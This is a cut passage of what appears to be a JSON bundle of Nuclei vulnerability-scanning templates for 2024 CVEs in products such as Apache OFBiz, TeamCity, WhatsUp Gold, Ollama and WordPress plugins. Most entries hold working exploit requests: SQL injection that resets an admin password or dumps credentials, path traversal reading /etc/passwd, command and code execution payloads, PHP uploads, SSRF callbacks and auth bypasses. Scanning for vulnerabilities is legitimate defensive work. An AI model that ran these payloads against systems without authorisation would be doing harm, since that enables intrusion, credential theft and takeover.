gid=\\d+\\(([^)]+)\\)"]},{"type":"word","part":"body","words":["java.lang.Exception"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2024-27564","info":{"name":"ChatGPT\u4e2a\u4eba\u4e13\u7528\u7248 - Server Side Request Forgery","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/pictureproxy.php?url=file:///etc/passwd","{{BaseURL}}/pictureproxy.php?url=http://{{interactsh-url}}"],"stop-at-first-match":true,"matchers-condition":"or","matchers":[{"type":"dsl","dsl":["status_code == 200","contains(header, \"image/jpeg\")","regex('root:.*:0:0:', body)"],"condition":"and"},{"type":"dsl","dsl":["contains(interactsh_protocol, \"dns\")","contains(header, \"image/jpeg\")","status_code == 200"],"condition":"and"}]}]},{"id":"CVE-2024-20440","info":{"name":"Cisco Smart Licensing Utility UnAuthenticated Logs Exposure Leaking Plaintext Credentials","severity":"high"},"requests":[{"raw":["GET /cslu/v1/var/logs/customer-cslu-lib-log.log HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["csluev.log"]},{"type":"word","part":"content_type","words":["text/x-log"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2024-4257","info":{"name":"BlueNet Technology Clinical Browsing System 1.2.1 - Sql Injection","severity":"medium"},"requests":[{"raw":["GET /login.php HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["contains(body,\"<title>\u4e34\u5e8a\u6d4f\u89c8</title>\")","contains(header,\"text/html\")","status_code == 200"],"condition":"and","internal":true}]},{"raw":["@timeout 20s\nGET /xds/deleteStudy.php?documentUniqueId=1%27;WAITFOR%20DELAY%20%270:0:6%27-- HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["duration>=6","contains(header,\"text/html\")","status_code == 200"],"condition":"and"}]}]},{"id":"CVE-2024-32113","info":{"name":"Apache OFBiz Directory Traversal - Remote Code Execution","severity":"high"},"requests":[{"raw":["POST /webtools/control/forgotPassword/%2e/%2e/ProgramExport HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\ngroovyProgram=%74%68%72%6f%77%20%6e%65%77%20%45%78%63%65%70%74%69%6f%6e(%27%69%64%27.%65%78%65%63%75%74%65().%74%65%78%74);\n"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["java.lang.Exception:","uid=([0-9(a-z-)]+) gid=([0-9(a-z-)]+) groups=([0-9(a-z-)]+)"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2024-6587","info":{"name":"LiteLLM - Server-Side Request Forgery","severity":"high"},"requests":[{"raw":["POST /chat/completions HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json\n\n{\n  \"model\": \"command-nightly\",\n  \"messages\": [\n    {\n      \"content\": \"Hello, how are you?\",\n      \"role\": \"user\"\n    }\n  ],\n  \"api_base\": \"https://{{interactsh-url}}\"\n}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"word","part":"interactsh_request","words":["Bearer"]}]}]},{"id":"CVE-2024-1212","info":{"name":"Progress Kemp LoadMaster - Command Injection","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/access/set?param=enableapi&value=1"],"headers":{"Authorization":"Basic JztsczsnOmRvZXNub3RtYXR0ZXI="},"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["bin","mnt","WWW-Authenticate: Basic"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2024-6924","info":{"name":"TrueBooker <= 1.0.2 - SQL Injection","severity":"high"},"requests":[{"raw":["GET / HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["contains(body, \"/wp-content/plugins/truebooker-appointment-booking\")"],"internal":true}]},{"raw":["@timeout 20s\nPOST /wp-content/plugins/truebooker-appointment-booking/main/truebooker-service-price.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\ntba_service_id=(SLEEP(6))\n"],"matchers":[{"type":"dsl","dsl":["duration>=6","status_code == 200"],"condition":"and"}]}]},{"id":"CVE-2024-37032","info":{"name":"Ollama - Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /api/pull HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json\n\n{\"name\": \"http://{{interactsh-url}}/rogue/{{randstr}}\", \"insecure\": true}\n","POST /api/push HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json\n\n{\"name\": \"http://{{interactsh-url}}/rogue/{{randstr}}\", \"insecure\": true}\n"],"matchers":[{"type":"dsl","dsl":["contains(interactsh_protocol, 'http')","contains_all(header, 'application/x-ndjson') && contains(body_2, 'retrieving manifest')"],"condition":"and"}]}]},{"id":"CVE-2024-6366","info":{"name":"User Profile Builder < 3.11.8 - File Upload","severity":"high"},"requests":[{"raw":["GET / HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["contains(body,\"/plugins/profile-builder\")"],"internal":true}]},{"raw":["POST /wp-admin/async-upload.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: multipart/form-data; boundary=----WebKitFormBoundary7MA4YWxkTrZu0gW\n\n------WebKitFormBoundary7MA4YWxkTrZu0gW\nContent-Disposition: form-data; name=\"wppb_upload\"\n\ntrue\n------WebKitFormBoundary7MA4YWxkTrZu0gW\nContent-Disposition: form-data; name=\"meta_name\"\n\n{{filename}}.gif\n------WebKitFormBoundary7MA4YWxkTrZu0gW\nContent-Disposition: form-data; name=\"_wpnonce\"\n\ne8\n------WebKitFormBoundary7MA4YWxkTrZu0gW\nContent-Disposition: form-data; name=\"action\"\n\nupload-attachment\n------WebKitFormBoundary7MA4YWxkTrZu0gW\nContent-Disposition: form-data; name=\"async-upload\"; filename=\"{{filename}}.gif\"\nContent-Type: image/jpeg\n\nGIF89a\n\n------WebKitFormBoundary7MA4YWxkTrZu0gW--\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"success\":true","\"id\"","\"uploadedTo\""],"condition":"and"},{"type":"word","part":"header","words":["Content-Type: text/plain"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2024-4439","info":{"name":"WordPress Core <6.5.2 - Cross-Site Scripting","severity":"high"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1\n","GET /wp-admin/ HTTP/1.1\nHost: {{Hostname}}\n","GET /wp-admin/post-new.php HTTP/1.1\nHost: {{Hostname}}\n","POST /?rest_route=/wp/v2/posts/{{postid}} HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json\nX-HTTP-Method-Override: PUT\nX-WP-Nonce: {{post_nonce}}\n\n{\"id\":{{postid}},\"title\":\"CVE-2024-4439\",\"content\":\"<!-- wp:avatar {\\\"isLink\\\":true,\\\"linkTarget\\\":\\\"_blank\\\"} /-->\",\"status\":\"publish\"}\n","GET /wp-admin/profile.php HTTP/1.1\nHost: {{Hostname}}\n","POST /wp-admin/profile.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\n_wpnonce={{profile_nonce}}&first_name=%22+onmouseover%3Dalert%28document.domain%29%3B+%2F%2F&last_name=&nickname=admin&display_name=%22+onmouseover%3Dalert%28document.domain%29%3B+%2F%2F&email=admin%40gmail.com&action=update&user_id={{userid}}&submit=Update+Profile\n","GET wp-login.php?action=logout&_wpnonce={{logout_nonce}} HTTP/1.1\nHost: {{Hostname}}\n","POST /wp-comments-post.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\ncomment=Unauthenticated+Comment&author=%22+onmouseover%3Dalert%28document.domain%29%3B+%2F%2F&email=example%40gmail.com&url=example.com&submit=Post+Comment&comment_post_ID={{postid}}\n","GET /?p={{postid}} HTTP/1.1\nHost: {{Hostname}}\n"],"host-redirects":true,"max-redirects":2,"matchers":[{"type":"word","part":"body_9","words":["aria-label=\"(\" onmouseover=alert(document.domain);"]},{"type":"word","part":"header_9","words":["text/html"]},{"type":"status","status":[200]}],"extractors":[{"type":"regex","name":"userid","part":"body_2","group":1,"internal":true,"regex":["user_id=(\\d+)"]},{"type":"regex","name":"logout_nonce","part":"body_2","group":2,"internal":true,"regex":["action=logout&(.*);\\_wpnonce=(.{10})"]},{"type":"regex","name":"postid","part":"body_3","group":1,"internal":true,"regex":["post=(\\d+)"]},{"type":"regex","name":"post_nonce","part":"body_3","group":1,"internal":true,"regex":["createNonceMiddleware\\(\\s\"(.*)\\\"\\s\\)"]},{"type":"regex","name":"profile_nonce","part":"body_5","group":1,"internal":true,"regex":["name=\\\"\\_wpnonce\\\"\\svalue=\"(.{10})\\\"\\s"]}]}]},{"id":"CVE-2024-7332","info":{"name":"TOTOLINK CP450 v4.1.0cu.747_B20191224 - Hard-Coded Password Vulnerability","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/web_cste/cgi-bin/product.ini"],"matchers":[{"type":"dsl","dsl":["contains_all(body,\"[PRODUCT]\",\"[WLAN]\",\"HostName\")","status_code == 200"],"condition":"and"}]}]},{"id":"CVE-2024-31849","info":{"name":"CData Connect < 23.4.8846 - Path Traversal","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/login.rst"],"matchers":[{"type":"word","internal":true,"words":["CData - Connect"]}]},{"raw":["GET /ui/..\\src\\getSettings.rsb?@json HTTP/1.1\nHost: {{Hostname}}\nReferer: {{RootURL}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"items\":[{",":\"true\"","notifyemail"],"condition":"and"},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2024-3234","info":{"name":"Chuanhu Chat - Directory Traversal","severity":"critical"},"requests":[{"raw":["GET /file=web_assets/../config.json HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"openai_api_key\":","\"openai_api_type\":"],"condition":"and"},{"type":"word","part":"content_type","words":["application/json"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2024-33113","info":{"name":"D-LINK DIR-845L bsc_sms_inbox.php file - Information Disclosure","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/getcfg.php?a=%0A_POST_SERVICES=DEVICE.ACCOUNT%0AAUTHORIZED_GROUP=1"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<service>DEVICE.ACCOUNT</service>","<seqno>"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2024-36412","info":{"name":"SuiteCRM - SQL Injection","severity":"critical"},"requests":[{"raw":["@timeout: 15s\nGET /index.php?entryPoint=responseEntryPoint&event=1&delegate=a<\"+UNION+SELECT+SLEEP(6);--+-&type=c&response=accept HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["duration>=6","status_code == 200","contains_any(body, \"You have already responded to the invitation or there\", \"Thank you for accepting\")"],"condition":"and"}]}]},{"id":"CVE-2024-8877","info":{"name":"Riello Netman 204 - SQL Injection","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/cgi-bin/db_eventlog_w.cgi?date_start=0&date_end=1715630160&gravity=%25&type=%25%27and/**/%271%27=%271"],"matchers":[{"type":"dsl","dsl":["contains_all(body, \"START APPLICATION\", \"category\\\":\", \"codeStr\\\":\")","status_code == 200"],"condition":"and"}]}]},{"id":"CVE-2024-38473","info":{"name":"Apache HTTP Server - ACL Bypass","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/{{files}}"],"payloads":{"files":["admin.php","adminer.php","xmlrpc.php",".env","admin.php","php-info.php","php_info.php","phpinfo.php","info.php","adminer.php","xmlrpc.php","bin/cron.php","cache/index.tpl.php","cpanel.php"]},"stop-at-first-match":true,"matchers":[{"type":"status","status":[403,401],"internal":true}]},{"method":"GET","path":["{{BaseURL}}/{{http_1_files}}%3ftest.php"],"matchers":[{"type":"status","status":[200]}]},{"method":"GET","path":["{{BaseURL}}/html/usr/share/doc/hostname/copyright%3f"],"matchers":[{"type":"word","words":["On Debian systems, the complete text of the GNU General Public License","This package was written by Peter Tobias"],"condition":"and"}]}]},{"id":"CVE-2024-8752","info":{"name":"WebIQ 2.15.9 - Directory Traversal","severity":"high"},"requests":[{"raw":["GET /.webui/..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cwindows%5cwin.ini HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["contains_all(body,\"bit app support\",\"fonts]\",\"extensions]\")","contains(content_type,\"image/svg+xml\")","status_code == 200"],"condition":"and"}]}]},{"id":"CVE-2024-4434","info":{"name":"LearnPress WordPress LMS Plugin <= 4.2.6.5 - SQL Injection","severity":"critical"},"requests":[{"raw":["GET / HTTP/1.1\nHost: {{Hostname}}\n","@timeout 20s\nPOST /wp-json/lp/v1/courses/archive-course?term_id={{num}})+OR+SLEEP(6)+--+A HTTP/1.1\nHost: {{Hostname}}\nX-WP-Nonce: {{nonce}}\n"],"matchers":[{"type":"dsl","dsl":["duration_2 >= 6","status_code_2 == 200","contains(content_type,\"application/json\")","contains_all(body_2,\"No courses were found\",\"success\")"],"condition":"and"}],"extractors":[{"type":"regex","name":"nonce","part":"body","group":1,"regex":["\"nonce\":\"([a-z0-9]+)\",\"is_course_archive\""],"internal":true}]}]},{"id":"CVE-2024-0195","info":{"name":"SpiderFlow Crawler Platform - Remote Code Execution","severity":"critical"},"requests":[{"raw":["GET / HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"word","internal":true,"words":["SPIDER_FLOW_VERSION"]}]},{"raw":["POST /function/save HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\nX-Requested-With: XMLHttpRequest\n\nid=1&name=cmd&parameter=rce&script=%7DJava.type('java.lang.Runtime').getRuntime().exec('ping+{{interactsh-url}}')%3B%7B\n"],"matchers":[{"type":"word","part":"interactsh_protocol","words":["dns"]}]}]},{"id":"CVE-2024-6670","info":{"name":"WhatsUp Gold HasErrors SQL Injection - Authentication Bypass","severity":"critical"},"requests":[{"raw":["POST /NmConsole/WugSystemAppSettings/JMXSecurity HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json\n\n{\"KeyStorePassword\": \"{{password}}\", \"TrustStorePassword\": \"{{password}}\"}\n"],"matchers":[{"type":"dsl","dsl":["status_code == 302","contains(set_cookie, 'ASP.NET_SessionId=')"],"condition":"and","internal":true}]},{"raw":["POST /NmConsole/Platform/PerformanceMonitorErrors/HasErrors HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json\n\n{\"deviceId\": \"22222\", \"classId\": \"DF215E10-8BD4-4401-B2DC-99BB03135F2E';UPDATE ProActiveAlert SET sAlertName='psyduck'+( SELECT sValue FROM GlobalSettings WHERE sName = '_GLOBAL_:JavaKeyStorePwd');--\", \"range\": \"1\", \"n\": \"1\", \"start\": \"3\", \"end\": \"4\", \"businesdsHoursId\": \"5\"}\n"],"matchers":[{"type":"dsl","dsl":["status_code == 200","contains(content_type, 'application/json')"],"condition":"and","internal":true}]},{"raw":["GET /NmConsole/Platform/Filter/AlertCenterItemsReportThresholds HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["status_code == 200","contains(body, 'DisplayName')"],"condition":"and","internal":true}],"extractors":[{"type":"regex","internal":true,"name":"encryptedPassword","regex":["\"psyduck\\d+(,\\d+)*\""]}]},{"raw":["POST /NmConsole/Platform/PerformanceMonitorErrors/HasErrors HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json\n\n{\"deviceId\": \"22222\", \"classId\": \"DF215E10-8BD4-4401-B2DC-99BB03135F2E';UPDATE WebUser SET sPassword = {{encryptedPassword}} where sUserName = 'admin';--\", \"range\": \"1\", \"n\": \"1\", \"start\": \"3\", \"end\": \"4\", \"businesdsHoursId\": \"5\"}\n"],"matchers":[{"type":"dsl","dsl":["status_code == 200","contains(body, 'false')"],"condition":"and","internal":true}]},{"raw":["POST /NmConsole/User/LoginAjax HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nusername={{username}}&password={{password}}&rememberMe=false\n"],"matchers":[{"type":"word","part":"body","words":["\"authenticated\":true","\"username\":\""],"condition":"and"}],"extractors":[{"type":"dsl","dsl":["\"USER: \"+ username","\"PASS: \"+ password"]}]}]},{"id":"CVE-2024-8698","info":{"name":"Keycloak - SAML Core Package Signature Validation Flaw","severity":"high"},"requests":[{"raw":["POST /realms/master/broker/saml/endpoint HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\nCookie: AUTH_SESSION_ID_LEGACY={{AUTH_SESSION_ID_LEGACY}}\n\nRelayState={{RELAYSTATE}}&SAMLResponse={{urlencode(base64(code_response))}}\n"],"matchers":[{"type":"dsl","dsl":["status_code == 302","contains_all(header,\"KEYCLOAK_IDENTITY\",\"KEYCLOAK_SESSION\")"],"condition":"and"}]}]},{"id":"CVE-2024-0939","info":{"name":"Smart S210 Management Platform - Arbitary File Upload","severity":"critical"},"requests":[{"raw":["POST /Tool/uploadfile.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: multipart/form-data; boundary=----WebKitFormBoundarywnsogfin\nAccept-Encoding: gzip, deflate, br\n\n------WebKitFormBoundarywnsogfin\nContent-Disposition: form-data; name=\"file_upload\"; filename=\"contents.php\"\nContent-Type: application/octet-stream\n\n<?php print({{num1}}*{{num2}}); ?>\n------WebKitFormBoundarywnsogfin\nContent-Disposition: form-data; name=\"txt_path\"\n\n/home/{{filename}}.php\n------WebKitFormBoundarywnsogfin--\n","GET /home/{{filename}}.php HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body_2","words":["{{result}}"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2024-31848","info":{"name":"CData API Server < 23.4.8844 - Path Traversal","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/login.rst"],"matchers":[{"type":"word","internal":true,"words":["<title>CData - API Server</title>"]}]},{"raw":["GET /ui/..\\src\\getSettings.rsb?@json HTTP/1.1\nHost: {{Hostname}}\nReferer: {{RootURL}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"items\":[{",":\"true\"","notifyemail"],"condition":"and"},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2024-32709","info":{"name":"WP-Recall <= 16.26.5 - SQL Injection","severity":"critical"},"requests":[{"raw":["GET /account/?user=1&tab=groups&group-name=p%27+or+%27%%27=%27%%27+union+all+select+1,2,3,4,5,6,7,8,9,10,11,concat(%22Database:%22,md5({{num}}),0x7c,%20%22Version:%22,version()),13--+- HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["{{md5(num)}}"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2024-9796","info":{"name":"WordPress WP-Advanced-Search <= 3.3.9 - SQL Injection","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/wp-advanced-search/class.inc/autocompletion/autocompletion-PHP5.5.php?q=admin&t=wp_users%20--&f=user_login&type=&e"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["Table '([a-zA-Z0-9_]+)\\.wp_users' doesn't exist"]},{"type":"status","status":[200]}],"extractors":[{"type":"regex","part":"body","name":"database_name","regex":["([a-zA-Z0-9_]+)\\.wp_users"]}]}]},{"id":"CVE-2024-7786","info":{"name":"Sensei LMS < 4.24.2 - Email Template Leak","severity":"high"},"requests":[{"raw":["GET /index.php/wp-json/wp/v2/sensei_email/ HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["contains_all(body,\"id\",\"date_gmt\",\"slug\")","contains(content_type,\"application/json\")","status_code == 200"],"condition":"and","internal":true}],"extractors":[{"type":"json","part":"body","name":"template_id","json":[".[0].id"],"internal":true}]},{"raw":["GET /index.php/wp-json/wp/v2/sensei_email/{{template_id}} HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["sensei_email_preview_id={{template_id}}","media?parent={{template_id}}"],"condition":"and"},{"type":"word","part":"content_type","words":["application/json"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2024-30269","info":{"name":"DataEase <= 2.4.1 - Sensitive Information Exposure","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/de2api/engine/getEngine;.js"],"matchers":[{"type":"dsl","dsl":["contains_all(body, \"username\", \"password\", \"port\", \"name\\\":\", \"pid\\\":\")","contains(content_type,\"application/json\")","status_code == 200"],"condition":"and"}]}]},{"id":"CVE-2024-47062","info":{"name":"Navidrome < 0.53.0 - Authenticated SQL Injection","severity":"critical"},"requests":[{"raw":["POST /auth/login HTTP/1.1\nHost: {{Hostname}}\ncontent-type: application/json\n\n{\"username\":\"{{username}}\",\"password\":\"{{password}}\"}\n"],"extractors":[{"type":"json","name":"auth_token","internal":true,"part":"body","json":[".token"]}]},{"raw":["GET /api/album?_end=36&_order=DESC&_sort=recently_added&_start=0&1+like+1)+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,(select+group_concat(concat(user_name,':',password))from+user),15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49--=123 HTTP/1.1\nHost: {{Hostname}}\nx-nd-authorization: Bearer {{auth_token}}\n"],"extractors":[{"type":"regex","group":1,"part":"body","regex":["sql/driver: couldn't convert \\\\\\\"(.*?)\\\\\\\""]}]}]},{"id":"CVE-2024-23917","info":{"name":"JetBrains TeamCity > 2023.11.3 - Authentication Bypass","severity":"critical"},"requests":[{"method":"POST","path":["{{BaseURL}}/app/rest/users/id:1/tokens/{{randstr}};.jsp?jsp_precompile=true"],"headers":{"Content-Type":"application/x-www-form-urlencoded"},"matchers":[{"type":"dsl","dsl":["status_code==200","contains(content_type,'application/xml')","contains(body,\"<token name=\\\"{{randstr}}\\\"\")"],"condition":"and","internal":true}],"extractors":[{"type":"regex","part":"body","name":"authtoken","internal":true,"group":1,"regex":["value=\"(.+)\""]}]},{"method":"GET","path":["{{BaseURL}}/app/rest/server"],"headers":{"Authorization":"Bearer {{authtoken}}"},"extractors":[{"type":"dsl","dsl":["\"Token:\" + authtoken"]}],"matchers":[{"type":"dsl","dsl":["status_code==200","contains(content_type,'application/xml')","contains(body,'<projects href=')"],"condition":"and"}]}]},{"id":"CVE-2024-27198","info":{"name":"TeamCity < 2023.11.4 - Authentication Bypass","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/hax?jsp=/app/rest/server;.jsp"],"matchers":[{"type":"dsl","dsl":["status_code == 200","contains(header, \"application/xml\")","contains_all(body, \"buildNumber\", \"server version\", \"internalId\")"],"condition":"and"}]}]},{"id":"CVE-2024-6846","info":{"name":"SmartSearchWP <= 2.4.4 - Unauthenticated Log Purge","severity":"medium"},"requests":[{"raw":["POST /wp-json/wdgpt/v1/purge-error-logs HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json\n\n{\"months\":\"1\"}\n"],"matchers":[{"type":"dsl","dsl":["contains_all(body,\"success\",\"true\", \"purged successfully\")","contains(content_type,\"application/json\")","status_code == 200"],"condition":"and"}]}]},{"id":"CVE-2024-8021","info":{"name":"Gradio - Open Redirect","severity":"medium"},"requests":[{"raw":["GET /file=http%3A%2F%2Foast.pro/ HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?://|//)(?:[a-zA-Z0-9\\-_\\.@]*)oast\\.pro.*$"],"part":"header"},{"type":"status","status":[302]}]}]},{"id":"CVE-2024-8517","info":{"name":"SPIP BigUp Plugin - Remote Code Execution","severity":"critical"},"requests":[{"raw":["GET /spip.ph%70?pag%65=spip_pass&lang=fr HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["formulaire_action_args","spip"],"condition":"and","internal":true}],"extractors":[{"type":"regex","part":"body","group":1,"name":"formulaire","regex":["name=['\"]formulaire_action_args['\"]\\s*type=['\"]hidden['\"]\\s*value=['\"]([^'\"]+)['\"]"],"internal":true}]},{"raw":["POST /spip.ph%70?pag%65=spip_pass&lang=fr HTTP/1.1\nHost: {{Hostname}}\nContent-Type: multipart/form-data; boundary=5f02b65945d644d6a32847ab130e9586\n\n--5f02b65945d644d6a32847ab130e9586\nContent-Disposition: form-data; name=\"page\"\n\nspip_pass\n--5f02b65945d644d6a32847ab130e9586\nContent-Disposition: form-data; name=\"lang\"\n\nfr\n--5f02b65945d644d6a32847ab130e9586\nContent-Disposition: form-data; name=\"formulaire_action\"\n\noubli\n--5f02b65945d644d6a32847ab130e9586\nContent-Disposition: form-data; name=\"formulaire_action_args\"\n\n{{formulaire}}\n--5f02b65945d644d6a32847ab130e9586\nContent-Disposition: form-data; name=\"formulaire_action_sign\"\n\n\n--5f02b65945d644d6a32847ab130e9586\nContent-Disposition: form-data; name=\"oubli\"\n\n{{email}}\n--5f02b65945d644d6a32847ab130e9586\nContent-Disposition: form-data; name=\"nobot\"\n\n\n--5f02b65945d644d6a32847ab130e9586\nContent-Disposition: form-data; name=\"bigup_retrouver_fichiers\"\n\na\n--5f02b65945d644d6a32847ab130e9586\nContent-Disposition: form-data; name=\"RCE['.system('id').die().']\"; filename=\"{{filename}}.txt\"\nContent-Type: text/plain\n\n{{string}}\n--5f02b65945d644d6a32847ab130e9586--\n"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["uid=[0-9]+.*gid=[0-9]+.*"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2024-46627","info":{"name":"DATAGERRY - REST API Auth Bypass","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/rest/users/1/settings/"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"response_type\":","\"model\":","\"time\":"],"condition":"and"},{"type":"word","part":"content_type","words":["application/json"]}]}]},{"id":"CVE-2024-32737","info":{"name":"CyberPower - SQL Injection","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/api/v1/confup?mode=lean&uid=1'%20UNION%20select%201,2,3,sqlite_version();--"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":[":\"finished\"","\"success\":"],"condition":"and"},{"type":"word","part":"content_type","words":["application/json"]},{"type":"status","status":[200]}],"extractors":[{"type":"regex","group":1,"regex":["\"modifiedtime\":\"([0-9.]+)\""]}]}]},{"id":"CVE-2024-31750","info":{"name":"F-logic DataCube3 - SQL Injection","severity":"high"},"requests":[{"raw":["POST /admin/pr_monitor/getting_index_data.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nreq_id=1) UNION ALL SELECT CHAR(113,120,107,107,113)||CHAR(117,78,85,110,71,119,86,122,111,101,81,87,68,72,80,107,90,112,111,110,120,72,78,70,76,99,100,81,80,77,89,75,86,65,105,99,74,67,122,107)||CHAR(113,106,120,122,113),NULL,NULL-- sTqG\n"],"matchers":[{"type":"dsl","dsl":["contains(body, \"qxkkquNUnGwVzoeQWDHPkZponxHNFLcdQPMYKVAicJCzkqjxzq\")","contains(header, \"application/json\")","status_code==200"],"condition":"and"}]}]},{"id":"CVE-2024-9061","info":{"name":"WP Popup Builder Popup Forms and Marketing Lead Generation <= 1.3.5 - Arbitrary Shortcode Execution","severity":"high"},"requests":[{"raw":["GET / HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["contains(body, \"/wp-content/plugins/wp-popup-builder\")","status_code == 200"],"condition":"and","internal":true}]},{"raw":["POST /wp-admin/admin-ajax.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\naction=shortcode_Api_Add&shortcode=%43%56%45%2d%32%30%32%34%2d%39%30%36%31\n"],"matchers":[{"type":"dsl","dsl":["len(body) == 13","contains(body, \"CVE-2024-9061\")","contains(content_type, \"text/html\")","status_code == 200"],"condition":"and"}]}]},{"id":"CVE-2024-4836","info":{"name":"Edito CMS - Sensitive Data Leak","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}"],"matchers":[{"type":"dsl","dsl":["contains_any(body,\"content=\\\"edito\", \"www.edito.pl\")","status_code==200"],"condition":"and","internal":true}]},{"method":"GET","path":["{{BaseURL}}/config.php","{{BaseURL}}/config/config.php","{{BaseURL}}/include/config.php","{{BaseURL}}/includes/config.php"],"matchers":[{"type":"dsl","dsl":["contains_all(body,\"db_password\", \"db_username\")","status_code==200"],"condition":"and"}]}]},{"id":"CVE-2024-22476","info":{"name":"Intel Neural Compressor <2.5.0 - SQL Injection","severity":"critical"},"requests":[{"raw":["POST /task/submit/ HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json\n\n{\"script_url\": \"https://github.com/huggingface/transformers/blob/v4.21-release/examples/pytorch/text-classification/run_glue.py\",\"optimized\": \"False\",\"arguments\": [\"--model_name_or_path bert-base-cased --task_name mrpc --do_eval --output_dir result\"],\"approach\": \"static\",\"requirements\": [],\"workers\": 1}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["status\":\"successfully","Task submitted successfully"],"condition":"and"},{"type":"word","part":"content_type","words":["application/json"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2024-32735","info":{"name":"CyberPower - 